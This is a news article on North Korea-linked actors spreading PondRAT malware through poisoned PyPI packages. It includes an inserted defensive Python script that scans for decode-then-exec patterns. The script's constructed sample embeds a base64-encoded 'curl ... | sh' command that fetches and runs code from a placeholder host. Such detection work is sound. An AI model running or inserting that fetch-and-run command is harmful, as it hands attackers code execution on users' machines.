New PondRAT Malware Hidden in Python Packages Targets Software Developers



Sep 23, 2024 | Ravie Lakshmanan | Software Security / Supply Chain

Threat actors with ties to North Korea have been observed using poisoned Python packages as a way to deliver a new malware called PondRAT as part of an ongoing campaign.

PondRAT, according to new findings from Palo Alto Networks Unit 42, is assessed to be a lighter version of POOLRAT (aka SIMPLESEA), a known macOS backdoor that has previously been attributed to the Lazarus Group and was deployed in attacks related to the 3CX supply chain compromise last year.

Some of these attacks are part of a persistent cyber attack campaign dubbed Operation Dream Job, in which potential targets are lured with enticing job offers in an attempt to trick them into downloading malware.

"The attackers behind this campaign uploaded several poisoned Python packages to PyPI, a popular repository of open-source Python packages," Unit 42 researcher Yoav Zemah said, linking the activity with medium confidence to a threat actor known as Gleaming Pisces.


The adversary is also tracked by the broader cybersecurity community under the names Citrine Sleet, Labyrinth Chollima, Nickel Academy, and UNC4736, a sub-cluster within the Lazarus Group that is also known for distributing the AppleJeus malware.

It is believed that the end goal of the attacks is to "secure access to supply chain vendors through developers' endpoints and subsequently gain access to the vendors' customers' endpoints, as observed in previous incidents."

The list of malicious packages, since removed from the PyPI repository, is below –

The infection chain is fairly straightforward: once downloaded and installed on developer systems, the packages are engineered to execute an encoded next stage that, in turn, runs the Linux and macOS versions of the RAT malware after retrieving them from a remote server.
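As an added example (not code from Unit 42 or from the article), the following audit script looks for the import-time pattern described above: a module that decodes an embedded blob and hands it straight to exec() or eval(). The package it scans is constructed inline for the demonstration; base64 is assumed as the encoding purely for illustration, since the article does not say how the real packages encoded their next stage, and the decoded text is a harmless placeholder rather than the actual downloader.

```python
"""Audit a site-packages tree for the import-time "decode then exec()" pattern.

Added example, not Unit 42's analysis tooling and not PondRAT dropper code.
"""
import ast
import base64
import tempfile
from pathlib import Path

# Decoder names commonly used to unwrap an embedded stage before exec()/eval().
DECODERS = {"b64decode", "b32decode", "b16decode", "unhexlify", "fromhex", "decompress"}

# Constructed sample standing in for a poisoned package. The "second stage" here
# is inert text pointing at a reserved .invalid domain; the real packages fetched
# Linux/macOS binaries from a remote server. Encoding is base64 by assumption.
_STAGE_TWO = "import os\nos.system('curl -s http://example.invalid/stage | sh')\n"
CONSTRUCTED_INIT = "import base64\nexec(base64.b64decode(%r))\n" % (
    base64.b64encode(_STAGE_TWO.encode()).decode()
)


def _call_name(func):
    """Name of a called function, whether written as exec(...) or mod.exec(...)."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def find_encoded_exec(source):
    """Return one finding per exec()/eval() whose argument subtree calls a decoder.

    'decoded' holds the base64 decoding of the first long string literal under
    that call so an analyst can read the stage, or None if no literal decodes.
    """
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and _call_name(node.func) in {"exec", "eval"}):
            continue
        decoders = sorted({_call_name(c.func) for c in ast.walk(node)
                           if isinstance(c, ast.Call) and _call_name(c.func) in DECODERS})
        if not decoders:
            continue  # plain exec("...") of readable code is noisy but not this pattern
        decoded = None
        for sub in ast.walk(node):
            if isinstance(sub, ast.Constant) and isinstance(sub.value, str) and len(sub.value) >= 16:
                try:
                    decoded = base64.b64decode(sub.value, validate=True).decode("utf-8", "replace")
                    break
                except ValueError:  # binascii.Error is a ValueError subclass
                    continue
        findings.append({"line": node.lineno, "decoders": decoders, "decoded": decoded})
    return findings


def scan_tree(root):
    """Walk a site-packages style tree and map relative path -> findings."""
    root = Path(root)
    results = {}
    for path in sorted(root.rglob("*.py")):
        try:
            hits = find_encoded_exec(path.read_text(encoding="utf-8", errors="replace"))
        except SyntaxError:
            continue  # not parseable by this interpreter; skip rather than abort the scan
        if hits:
            results[path.relative_to(root).as_posix()] = hits
    return results


def demo():
    """Plant the constructed package in a scratch directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp) / "site-packages"
        pkg = site / "legit_looking_pkg"
        pkg.mkdir(parents=True)
        (pkg / "__init__.py").write_text(CONSTRUCTED_INIT)
        # A benign module that merely uses base64 must not be flagged.
        (pkg / "utils.py").write_text(
            "import base64\n\ndef tag(s):\n    return base64.b64encode(s.encode()).decode()\n"
        )
        return scan_tree(site)


if __name__ == "__main__":
    for path, hits in demo().items():
        for h in hits:
            print(f"{path}:{h['line']} exec/eval fed by {h['decoders']}\n--- decoded stage ---\n{h['decoded']}")
```

To use it on a real environment, point scan_tree() at that environment's site-packages directory (or at a freshly unpacked sdist or wheel before installing it). A hit is a lead to review, not proof of compromise: a few legitimate packages embed encoded data, but decode-then-exec at import time is rare enough that each hit deserves a look at the decoded text.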


Further analysis of PondRAT has revealed similarities with both POOLRAT and AppleJeus, with the attacks also distributing new Linux variants of POOLRAT.

"The Linux and macOS versions [of POOLRAT] use an identical function structure for loading their configurations, featuring similar method names and functionality," Zemah said.

"Additionally, the method names in both variants are strikingly similar, and the strings are almost identical. Lastly, the mechanism that handles commands from the [command-and-control server] is nearly identical."

PondRAT, a leaner version of POOLRAT, comes with capabilities to upload and download files, pause operations for a predefined time interval, and execute arbitrary commands.


"The evidence of additional Linux variants of POOLRAT showed that Gleaming Pisces has been enhancing its capabilities across both Linux and macOS platforms," Unit 42 said.

"The weaponization of legitimate-looking Python packages across multiple operating systems poses a significant risk to organizations. Successful installation of malicious third-party packages can result in malware infection that compromises an entire network."

The disclosure comes as KnowBe4, which was duped into hiring a North Korean threat actor as an employee, said more than a dozen companies "either hired North Korean employees or had been besieged by a multitude of fake resumes and applications submitted by North Koreans hoping to get a job with their organization."

It described the activity, tracked by CrowdStrike under the moniker Famous Chollima, as a "complex, industrial, scaled nation-state operation" and said that it poses a "serious risk for any company with remote-only employees."
